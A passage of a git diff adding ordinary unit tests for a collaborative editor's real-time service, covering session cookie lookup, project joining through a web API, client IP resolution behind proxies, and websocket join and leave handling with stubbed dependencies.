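+//         // no cookie at all, a different cookie, or a bad signature
+//         return sessionSockets.emit(
+//           'connection',
+//           new Error('could not look up session by key'),
+//           socket
+//         )
+//       }
+//       sessionStore.get(sessionId, (error, session) => {
+//         if (error) {
+//           return sessionSockets.emit('connection', error, socket)
+//         }
+//         if (!session) {
+//           return sessionSockets.emit(
+//             'connection',
+//             new Error('could not look up session by key'),
+//             socket
+//           )
+//         }
+//         sessionSockets.emit('connection', null, socket, session)
+//       })
+//     })
+//   })
+//   return sessionSockets
+// }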
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { EventEmitter } = require('node:events') +const { expect } = require('chai') +const SandboxedModule = require('sandboxed-module') +const modulePath = '../../../app/js/SessionSockets' +const sinon = require('sinon') + +describe('SessionSockets', function () { + beforeEach(function () { + this.metrics = { inc: sinon.stub() } + this.SessionSocketsModule = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/metrics': this.metrics, + }, + }) + this.io = new EventEmitter() + this.id1 = Math.random().toString() + this.id2 = Math.random().toString() + const redisResponses = { + error: [new Error('Redis: something went wrong'), null], + unknownId: [null, null], + } + redisResponses[this.id1] = [null, { user: { _id: '123' } }] + redisResponses[this.id2] = [null, { user: { _id: 'abc' } }] + + this.sessionStore = { + get: sinon + .stub() + .callsFake((id, fn) => fn.apply(null, redisResponses[id])), + } + this.cookieParser = function (req, res, next) { + req.signedCookies = req._signedCookies + return next() + } + this.SessionSockets = this.SessionSocketsModule( + this.io, + this.sessionStore, + this.cookieParser, + 'ol.sid' + ) + return (this.checkSocket = (socket, fn) => { + this.SessionSockets.once('connection', fn) + return this.io.emit('connection', socket) + }) + }) + + describe('without cookies', function () { + beforeEach(function () { + return (this.socket = { handshake: {} }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + + it('should increment the session.cookie metric with status "none"', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'none', + }) + return done() + }) + }) + }) + + describe('with a different cookie', function () { + beforeEach(function () { + return (this.socket = { handshake: { _signedCookies: { other: 1 } } }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + }) + + describe('with a cookie with an invalid signature', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': false } }, + }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should not query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(false) + return done() + }) + }) + + it('should increment the session.cookie metric with status=bad-signature', function (done) { + 
return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'bad-signature', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and a failing session lookup', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': 'error' } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should return a redis error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('Redis: something went wrong') + return done() + }) + }) + + it('should increment the session.cookie metric with status=error', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'error', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and no matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': 'unknownId' } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should return a lookup error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.exist + expect(error.message).to.equal('could not look up session by key') + return done() + }) + }) + + it('should increment the session.cookie metric with status=missing', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'missing', + }) + return done() + }) + }) + }) + + describe('with a valid cookie and a matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': this.id1 } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should not return an error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.not.exist + return done() + }) + }) + + it('should return the session', function (done) { + return this.checkSocket(this.socket, (error, s, session) => { + if (error) return done(error) + expect(session).to.deep.equal({ user: { _id: '123' } }) + return done() + }) + }) + + it('should increment the session.cookie metric with status=signed', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, { + status: 'signed', + }) + return done() + }) + }) + }) + + describe('with a different valid cookie and matching session', function () { + beforeEach(function () { + return (this.socket = { + handshake: { _signedCookies: { 'ol.sid': this.id2 } }, + }) + }) + + it('should query redis', function (done) { + return this.checkSocket(this.socket, () => { + expect(this.sessionStore.get.called).to.equal(true) + return done() + }) + }) + + it('should not return an error', function (done) { + return this.checkSocket(this.socket, error => { + expect(error).to.not.exist + return done() + }) + }) + + it('should return the other session', function (done) { + return this.checkSocket(this.socket, (error, s, 
session) => {
+ if (error) return done(error)
+ expect(session).to.deep.equal({ user: { _id: 'abc' } })
+ return done()
+ })
+ })
+
+ it('should increment the session.cookie metric with status=signed', function (done) {
+ return this.checkSocket(this.socket, () => {
+ expect(this.metrics.inc).to.be.calledWith('session.cookie', 1, {
+ status: 'signed',
+ })
+ return done()
+ })
+ })
+ })
+}) diff --git a/services/real-time/test/unit/js/WebApiManagerTests.js b/services/real-time/test/unit/js/WebApiManagerTests.js new file mode 100644 index 0000000..b68661c --- /dev/null +++ b/services/real-time/test/unit/js/WebApiManagerTests.js @@ -0,0 +1,268 @@ +/* eslint-disable
+ no-return-assign,
+ no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS102: Remove unnecessary code created because of implicit returns
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const sinon = require('sinon')
+const modulePath = '../../../app/js/WebApiManager.js'
+const SandboxedModule = require('sandboxed-module')
+const { CodedError } = require('../../../app/js/Errors')
+
+describe('WebApiManager', function () {
+ beforeEach(function () {
+ this.project_id = 'project-id-123'
+ this.user_id = 'user-id-123'
+ this.user = { _id: this.user_id }
+ this.callback = sinon.stub()
+ return (this.WebApiManager = SandboxedModule.require(modulePath, {
+ requires: {
+ request: (this.request = {}),
+ '@overleaf/settings': (this.settings = {
+ apis: {
+ web: {
+ url: 'http://web.example.com',
+ user: 'username',
+ pass: 'password',
+ },
+ },
+ }),
+ },
+ }))
+ })
+
+ return describe('joinProject', function () {
+ describe('successfully', function () {
+ beforeEach(function () {
+ this.response = {
+ project: { name: 'Test project' },
+ privilegeLevel: 'owner',
+ isRestrictedUser: true,
+ isTokenMember: true,
+ isInvitedMember: true,
+ }
+ this.request.post = sinon
+ .stub()
+ .callsArgWith(1, null, { statusCode: 200 }, this.response)
+ return this.WebApiManager.joinProject(
+ this.project_id,
+ this.user,
+ this.callback
+ )
+ })
+
+ it('should send a request to web to join the project', function () {
+ return this.request.post
+ .calledWith({
+ url: `${this.settings.apis.web.url}/project/${this.project_id}/join`,
+ auth: {
+ user: this.settings.apis.web.user,
+ pass: this.settings.apis.web.pass,
+ sendImmediately: true,
+ },
+ json: {
+ userId: this.user_id,
+ anonymousAccessToken: undefined,
+ },
+ jar: false,
+ })
+ .should.equal(true)
+ })
+
+ return it('should return the project, privilegeLevel, and restricted flag', function () {
+ return this.callback
+ .calledWith(
+ null,
+ this.response.project,
+ this.response.privilegeLevel,
+ {
+ isRestrictedUser: this.response.isRestrictedUser,
+ isTokenMember: this.response.isTokenMember,
+ isInvitedMember: this.response.isInvitedMember,
+ }
+ )
+ .should.equal(true)
+ })
+ })
+
+ describe('with anon user', function () {
+ beforeEach(function () {
+ this.user_id = 'anonymous-user'
+ this.token = 'a-ro-token'
+ this.user = {
+ _id: this.user_id,
+ anonymousAccessToken: this.token,
+ }
+ this.response = {
+ project: { name: 'Test project' },
+ privilegeLevel: 'readOnly',
+ isRestrictedUser: true,
+ isTokenMember: false,
+ isInvitedMember: false,
+ }
+ this.request.post = sinon
+ .stub()
+ .yields(null, { statusCode: 200 }, this.response)
+ this.WebApiManager.joinProject(
+ this.project_id,
+ this.user,
+ this.callback
+ )
+ })
+
+ 
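// Editor's note: the error-handling tests further down pin the status-code
+ // mapping; this hypothetical helper sketches how joinProject presumably
+ // translates web's responses (an assumption, not the module's actual code;
+ // the exact CodedError constructor signature is assumed too):
+ //
+ // function handleJoinResponse(statusCode, body, callback) {
+ //   if (statusCode === 403) return callback(new Error('not authorized'))
+ //   if (statusCode === 404) {
+ //     return callback(new CodedError('project not found', 'ProjectNotFound'))
+ //   }
+ //   if (statusCode === 429) {
+ //     return callback(
+ //       new CodedError('rate-limit hit when joining project', 'TooManyRequests')
+ //     )
+ //   }
+ //   if (statusCode !== 200) {
+ //     return callback(new Error('non-success status code from web'))
+ //   }
+ //   if (!body) {
+ //     return callback(new Error('no data returned from joinProject request'))
+ //   }
+ //   callback(null, body.project, body.privilegeLevel, body)
+ // }
+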
it('should send a request to web to join the project', function () { + this.request.post.should.have.been.calledWith({ + url: `${this.settings.apis.web.url}/project/${this.project_id}/join`, + auth: { + user: this.settings.apis.web.user, + pass: this.settings.apis.web.pass, + sendImmediately: true, + }, + json: { + userId: this.user_id, + anonymousAccessToken: this.token, + }, + jar: false, + }) + }) + + it('should return the project, privilegeLevel, and restricted flag', function () { + this.callback.should.have.been.calledWith( + null, + this.response.project, + this.response.privilegeLevel, + { + isRestrictedUser: this.response.isRestrictedUser, + isTokenMember: this.response.isTokenMember, + isInvitedMember: this.response.isInvitedMember, + } + ) + }) + }) + + describe('when web replies with a 403', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 403 }, null) + this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith( + sinon.match({ + message: 'not authorized', + }) + ) + .should.equal(true) + }) + }) + + describe('when web replies with a 404', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 404 }, null) + this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + it('should call the callback with an error', function () { + this.callback + .calledWith( + sinon.match({ + message: 'project not found', + info: { code: 'ProjectNotFound' }, + }) + ) + .should.equal(true) + }) + }) + + describe('with an error from web', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 500 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with an error', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'non-success status code from web', + info: { statusCode: 500 }, + }) + ) + .should.equal(true) + }) + }) + + describe('with no data from web', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 200 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with an error', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'no data returned from joinProject request', + }) + ) + .should.equal(true) + }) + }) + + return describe('when the project is over its rate limit', function () { + beforeEach(function () { + this.request.post = sinon + .stub() + .callsArgWith(1, null, { statusCode: 429 }, null) + return this.WebApiManager.joinProject( + this.project_id, + this.user_id, + this.callback + ) + }) + + return it('should call the callback with a TooManyRequests error code', function () { + return this.callback + .calledWith( + sinon.match({ + message: 'rate-limit hit when joining project', + info: { + code: 'TooManyRequests', + }, + }) + ) + .should.equal(true) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketAddressManagerTests.js b/services/real-time/test/unit/js/WebsocketAddressManagerTests.js new file mode 100644 index 0000000..89d4598 --- /dev/null +++ 
b/services/real-time/test/unit/js/WebsocketAddressManagerTests.js @@ -0,0 +1,100 @@ +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/WebsocketAddressManager' +) + +describe('WebsocketAddressManager', function () { + beforeEach(function () { + this.WebsocketAddressManager = SandboxedModule.require(modulePath, { + requires: {}, + }) + }) + + describe('with a proxy configuration', function () { + beforeEach(function () { + this.websocketAddressManager = new this.WebsocketAddressManager( + true, + '127.0.0.1' + ) + }) + + it('should return the client ip address when behind a proxy', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: { + 'x-forwarded-proto': 'https', + 'x-forwarded-for': '123.45.67.89', + }, + address: { address: '127.0.0.1' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return the client ip address for a direct connection', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return the client ip address when there are no headers in the handshake', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return a "client-handshake-missing" response when the handshake is missing', function () { + expect(this.websocketAddressManager.getRemoteIp()).to.equal( + 'client-handshake-missing' + ) + }) + }) + + describe('without a proxy configuration', function () { + beforeEach(function () { + this.websocketAddressManager = new this.WebsocketAddressManager(false) + }) + + it('should return the client ip address for a direct connection', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { address: '123.45.67.89' }, + }) + ).to.equal('123.45.67.89') + }) + + it('should return undefined if the client ip address is not present', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: {}, + address: { otherAddressProperty: '123.45.67.89' }, + }) + ).to.be.undefined + }) + + it('should return the proxy ip address if there is actually a proxy', function () { + expect( + this.websocketAddressManager.getRemoteIp({ + headers: { + 'x-forwarded-proto': 'https', + 'x-forwarded-for': '123.45.67.89', + }, + address: { address: '127.0.0.1' }, + }) + ).to.equal('127.0.0.1') + }) + + it('should return a "client-handshake-missing" response when the handshake is missing', function () { + expect(this.websocketAddressManager.getRemoteIp()).to.equal( + 'client-handshake-missing' + ) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketControllerTests.js b/services/real-time/test/unit/js/WebsocketControllerTests.js new file mode 100644 index 0000000..1f3ca67 --- /dev/null +++ b/services/real-time/test/unit/js/WebsocketControllerTests.js @@ -0,0 +1,1698 @@ +/* eslint-disable + no-return-assign, + no-throw-literal, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
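+// Editor's note: the WebsocketAddressManagerTests above suggest roughly this
+// behaviour for getRemoteIp (a sketch under that assumption; the real module
+// likely also validates the trusted proxy addresses it is given):
+//
+// class WebsocketAddressManager {
+//   constructor(behindProxy, trustedProxyIps) {
+//     this.behindProxy = behindProxy
+//     this.trustedProxyIps = trustedProxyIps
+//   }
+//
+//   getRemoteIp(handshake) {
+//     if (!handshake) return 'client-handshake-missing'
+//     const forwardedFor =
+//       handshake.headers && handshake.headers['x-forwarded-for']
+//     if (this.behindProxy && forwardedFor) {
+//       // take the first (client) address from the proxy chain
+//       return forwardedFor.split(',')[0].trim()
+//     }
+//     return handshake.address && handshake.address.address
+//   }
+// }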
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../app/js/WebsocketController.js' +const SandboxedModule = require('sandboxed-module') +const tk = require('timekeeper') +const { UpdateTooLargeError } = require('../../../app/js/Errors') + +describe('WebsocketController', function () { + beforeEach(function () { + tk.freeze(new Date()) + this.project_id = 'project-id-123' + this.user = { + _id: (this.user_id = 'user-id-123'), + first_name: 'James', + last_name: 'Allen', + email: 'james@example.com', + signUpDate: new Date('2014-01-01'), + loginCount: 42, + } + this.callback = sinon.stub() + this.client = { + disconnected: false, + id: (this.client_id = 'mock-client-id-123'), + publicId: `other-id-${Math.random()}`, + ol_context: {}, + joinLeaveEpoch: 0, + join: sinon.stub(), + leave: sinon.stub(), + } + return (this.WebsocketController = SandboxedModule.require(modulePath, { + requires: { + './WebApiManager': (this.WebApiManager = {}), + './AuthorizationManager': (this.AuthorizationManager = {}), + './DocumentUpdaterManager': (this.DocumentUpdaterManager = {}), + './ConnectedUsersManager': (this.ConnectedUsersManager = {}), + './WebsocketLoadBalancer': (this.WebsocketLoadBalancer = {}), + '@overleaf/metrics': (this.metrics = { + inc: sinon.stub(), + set: sinon.stub(), + }), + './RoomManager': (this.RoomManager = {}), + }, + })) + }) + + afterEach(function () { + return tk.reset() + }) + + describe('joinProject', function () { + describe('when authorised', function () { + beforeEach(function () { + this.client.id = 'mock-client-id' + this.project = { + name: 'Test Project', + owner: { + _id: (this.owner_id = 'mock-owner-id-123'), + }, + } + this.privilegeLevel = 'owner' + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.isRestrictedUser = true + this.isTokenMember = true + this.isInvitedMember = true + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + this.RoomManager.joinProject = sinon.stub().callsArg(2) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should load the project from web', function () { + return this.WebApiManager.joinProject + .calledWith(this.project_id, this.user) + .should.equal(true) + }) + + it('should join the project room', function () { + return this.RoomManager.joinProject + .calledWith(this.client, this.project_id) + .should.equal(true) + }) + + it('should set the privilege level on the client', function () { + return this.client.ol_context.privilege_level.should.equal( + this.privilegeLevel + ) + }) + it("should set the user's id on the client", function () { + return this.client.ol_context.user_id.should.equal(this.user._id) + }) + it("should set the user's email on the client", function () { + return this.client.ol_context.email.should.equal(this.user.email) + }) + it("should set the user's first_name on the client", function () { + return this.client.ol_context.first_name.should.equal( + this.user.first_name + ) + }) + it("should set the user's last_name on the 
client", function () { + return this.client.ol_context.last_name.should.equal( + this.user.last_name + ) + }) + it("should set the user's sign up date on the client", function () { + return this.client.ol_context.signup_date.should.equal( + this.user.signUpDate + ) + }) + it("should set the user's login_count on the client", function () { + return this.client.ol_context.login_count.should.equal( + this.user.loginCount + ) + }) + it('should set the connected time on the client', function () { + return this.client.ol_context.connected_time.should.equal(new Date()) + }) + it('should set the project_id on the client', function () { + return this.client.ol_context.project_id.should.equal(this.project_id) + }) + it('should set the project owner id on the client', function () { + return this.client.ol_context.owner_id.should.equal(this.owner_id) + }) + it('should set the is_restricted_user flag on the client', function () { + return this.client.ol_context.is_restricted_user.should.equal( + this.isRestrictedUser + ) + }) + it('should set the is_token_member flag on the client', function () { + this.client.ol_context.is_token_member.should.equal(this.isTokenMember) + }) + it('should set the is_invited_member flag on the client', function () { + this.client.ol_context.is_invited_member.should.equal( + this.isInvitedMember + ) + }) + it('should call the callback with the project, privilegeLevel and protocolVersion', function () { + return this.callback + .calledWith( + null, + this.project, + this.privilegeLevel, + this.WebsocketController.PROTOCOL_VERSION + ) + .should.equal(true) + }) + + it('should mark the user as connected in ConnectedUsersManager', function () { + return this.ConnectedUsersManager.updateUserPosition + .calledWith(this.project_id, this.client.publicId, this.user, null) + .should.equal(true) + }) + + return it('should increment the join-project metric', function () { + return this.metrics.inc + .calledWith('editor.join-project') + .should.equal(true) + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, null, null) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should return an error', function () { + return this.callback + .calledWith(sinon.match({ message: 'not authorized' })) + .should.equal(true) + }) + + return it('should not log an error', function () { + return this.logger.error.called.should.equal(false) + }) + }) + + describe('when the subscribe failed', function () { + beforeEach(function () { + this.client.id = 'mock-client-id' + this.project = { + name: 'Test Project', + owner: { + _id: (this.owner_id = 'mock-owner-id-123'), + }, + } + this.privilegeLevel = 'owner' + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.isRestrictedUser = true + this.isTokenMember = true + this.isInvitedMember = true + this.WebApiManager.joinProject = sinon + .stub() + .callsArgWith(2, null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + this.RoomManager.joinProject = sinon + .stub() + .callsArgWith(2, new Error('subscribe failed')) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + return it('should return an error', function () { + this.callback + .calledWith(sinon.match({ 
message: 'subscribe failed' })) + .should.equal(true) + return this.callback.args[0][0].message.should.equal('subscribe failed') + }) + }) + + describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + this.WebApiManager.joinProject = sinon.stub().callsArg(2) + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should not call WebApiManager.joinProject', function () { + return expect(this.WebApiManager.joinProject.called).to.equal(false) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-project.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-project.disconnected', 1, { + status: 'immediately', + }) + ).to.equal(true) + }) + }) + + return describe('when the client disconnects while WebApiManager.joinProject is running', function () { + beforeEach(function () { + this.WebApiManager.joinProject = (project, user, cb) => { + this.client.disconnected = true + return cb(null, this.project, this.privilegeLevel, { + isRestrictedUser: this.isRestrictedUser, + isTokenMember: this.isTokenMember, + isInvitedMember: this.isInvitedMember, + }) + } + + return this.WebsocketController.joinProject( + this.client, + this.user, + this.project_id, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-project.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-project.disconnected', 1, { + status: 'after-web-api-call', + }) + ).to.equal(true) + }) + }) + }) + + describe('leaveProject', function () { + beforeEach(function () { + this.DocumentUpdaterManager.flushProjectToMongoAndDelete = sinon + .stub() + .callsArg(1) + this.ConnectedUsersManager.markUserAsDisconnected = sinon + .stub() + .callsArg(2) + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + this.RoomManager.leaveProjectAndDocs = sinon.stub() + this.clientsInRoom = [] + this.io = { + sockets: { + clients: roomId => { + if (roomId !== this.project_id) { + throw 'expected room_id to be project_id' + } + return this.clientsInRoom + }, + }, + } + this.client.ol_context.project_id = this.project_id + this.client.ol_context.user_id = this.user_id + this.WebsocketController.FLUSH_IF_EMPTY_DELAY = 0 + return tk.reset() + }) // Allow setTimeout to work. 
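+
+ // Editor's note: a sketch of the leaveProject flow implied by the tests in
+ // this block (assumed shape, not the controller's actual code):
+ //
+ // leaveProject(io, client, callback) {
+ //   const { project_id: projectId } = client.ol_context
+ //   if (!projectId) return callback() // client never joined a project
+ //   WebsocketLoadBalancer.emitToRoom(
+ //     projectId,
+ //     'clientTracking.clientDisconnected',
+ //     client.publicId
+ //   )
+ //   RoomManager.leaveProjectAndDocs(client)
+ //   ConnectedUsersManager.markUserAsDisconnected(projectId, client.publicId, () => {
+ //     // only flush the project once the last client has gone
+ //     setTimeout(() => {
+ //       if (io.sockets.clients(projectId).length === 0) {
+ //         return DocumentUpdaterManager.flushProjectToMongoAndDelete(projectId, callback)
+ //       }
+ //       callback()
+ //     }, this.FLUSH_IF_EMPTY_DELAY)
+ //   })
+ // }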
+
+ describe('when the client has not joined a project yet', function () {
+ beforeEach(function (done) {
+ this.client.ol_context = {}
+ return this.WebsocketController.leaveProject(this.io, this.client, done)
+ })
+
+ it('should bail out when calling leaveProject', function () {
+ this.WebsocketLoadBalancer.emitToRoom.called.should.equal(false)
+ this.RoomManager.leaveProjectAndDocs.called.should.equal(false)
+ return this.ConnectedUsersManager.markUserAsDisconnected.called.should.equal(
+ false
+ )
+ })
+
+ return it('should not inc any metric', function () {
+ return this.metrics.inc.called.should.equal(false)
+ })
+ })
+
+ describe('when the project is empty', function () {
+ beforeEach(function (done) {
+ this.clientsInRoom = []
+ return this.WebsocketController.leaveProject(this.io, this.client, done)
+ })
+
+ it('should send clientTracking.clientDisconnected to the project room', function () {
+ return this.WebsocketLoadBalancer.emitToRoom
+ .calledWith(
+ this.project_id,
+ 'clientTracking.clientDisconnected',
+ this.client.publicId
+ )
+ .should.equal(true)
+ })
+
+ it('should mark the user as disconnected', function () {
+ return this.ConnectedUsersManager.markUserAsDisconnected
+ .calledWith(this.project_id, this.client.publicId)
+ .should.equal(true)
+ })
+
+ it('should flush the project in the document updater', function () {
+ return this.DocumentUpdaterManager.flushProjectToMongoAndDelete
+ .calledWith(this.project_id)
+ .should.equal(true)
+ })
+
+ it('should increment the leave-project metric', function () {
+ return this.metrics.inc
+ .calledWith('editor.leave-project')
+ .should.equal(true)
+ })
+
+ return it('should track the disconnection in RoomManager', function () {
+ return this.RoomManager.leaveProjectAndDocs
+ .calledWith(this.client)
+ .should.equal(true)
+ })
+ })
+
+ describe('when the project is not empty', function () {
+ beforeEach(function (done) {
+ this.clientsInRoom = ['mock-remaining-client']
+ this.io = {
+ sockets: {
+ clients: roomId => {
+ if (roomId !== this.project_id) {
+ throw 'expected room_id to be project_id'
+ }
+ return this.clientsInRoom
+ },
+ },
+ }
+ return this.WebsocketController.leaveProject(this.io, this.client, done)
+ })
+
+ return it('should not flush the project in the document updater', function () {
+ return this.DocumentUpdaterManager.flushProjectToMongoAndDelete.called.should.equal(
+ false
+ )
+ })
+ })
+
+ describe('when client has not authenticated', function () {
+ beforeEach(function (done) {
+ this.client.ol_context.user_id = null
+ this.client.ol_context.project_id = null
+ return this.WebsocketController.leaveProject(this.io, this.client, done)
+ })
+
+ it('should not send clientTracking.clientDisconnected to the project room', function () {
+ return this.WebsocketLoadBalancer.emitToRoom
+ .calledWith(
+ this.project_id,
+ 'clientTracking.clientDisconnected',
+ this.client.publicId
+ )
+ .should.equal(false)
+ })
+
+ it('should not mark the user as disconnected', function () {
+ return this.ConnectedUsersManager.markUserAsDisconnected
+ .calledWith(this.project_id, this.client.publicId)
+ .should.equal(false)
+ })
+
+ it('should not flush the project in the document updater', function () {
+ return this.DocumentUpdaterManager.flushProjectToMongoAndDelete
+ .calledWith(this.project_id)
+ .should.equal(false)
+ })
+
+ return it('should not increment the leave-project metric', function () {
+ return this.metrics.inc
+ .calledWith('editor.leave-project')
+ .should.equal(false)
+ })
+ })
+
+ return describe('when client 
has not joined a project', function () {
+ beforeEach(function (done) {
+ this.client.ol_context.user_id = this.user_id
+ this.client.ol_context.project_id = null
+ return this.WebsocketController.leaveProject(this.io, this.client, done)
+ })
+
+ it('should not send clientTracking.clientDisconnected to the project room', function () {
+ return this.WebsocketLoadBalancer.emitToRoom
+ .calledWith(
+ this.project_id,
+ 'clientTracking.clientDisconnected',
+ this.client.publicId
+ )
+ .should.equal(false)
+ })
+
+ it('should not mark the user as disconnected', function () {
+ return this.ConnectedUsersManager.markUserAsDisconnected
+ .calledWith(this.project_id, this.client.publicId)
+ .should.equal(false)
+ })
+
+ it('should not flush the project in the document updater', function () {
+ return this.DocumentUpdaterManager.flushProjectToMongoAndDelete
+ .calledWith(this.project_id)
+ .should.equal(false)
+ })
+
+ return it('should not increment the leave-project metric', function () {
+ return this.metrics.inc
+ .calledWith('editor.leave-project')
+ .should.equal(false)
+ })
+ })
+ })
+
+ describe('joinDoc', function () {
+ beforeEach(function () {
+ this.doc_id = 'doc-id-123'
+ this.doc_lines = ['doc', 'lines']
+ this.version = 42
+ this.ops = ['mock', 'ops']
+ this.ranges = { mock: 'ranges' }
+ this.options = {}
+
+ this.client.ol_context.project_id = this.project_id
+ this.client.ol_context.is_restricted_user = false
+ this.AuthorizationManager.addAccessToDoc = sinon.stub().yields()
+ this.AuthorizationManager.assertClientCanViewProject = sinon
+ .stub()
+ .callsArgWith(1, null)
+ this.AuthorizationManager.assertClientCanViewProjectAndDoc = sinon
+ .stub()
+ .callsArgWith(2, null)
+ this.DocumentUpdaterManager.getDocument = sinon
+ .stub()
+ .callsArgWith(
+ 3,
+ null,
+ this.doc_lines,
+ this.version,
+ this.ranges,
+ this.ops
+ )
+ return (this.RoomManager.joinDoc = sinon.stub().callsArg(2))
+ })
+
+ describe('works', function () {
+ beforeEach(function () {
+ return this.WebsocketController.joinDoc(
+ this.client,
+ this.doc_id,
+ -1,
+ this.options,
+ this.callback
+ )
+ })
+
+ it('should inc the joinLeaveEpoch', function () {
+ expect(this.client.joinLeaveEpoch).to.equal(1)
+ })
+
+ it('should check that the client is authorized to view the project', function () {
+ return this.AuthorizationManager.assertClientCanViewProject
+ .calledWith(this.client)
+ .should.equal(true)
+ })
+
+ it('should get the document from the DocumentUpdaterManager with fromVersion', function () {
+ return this.DocumentUpdaterManager.getDocument
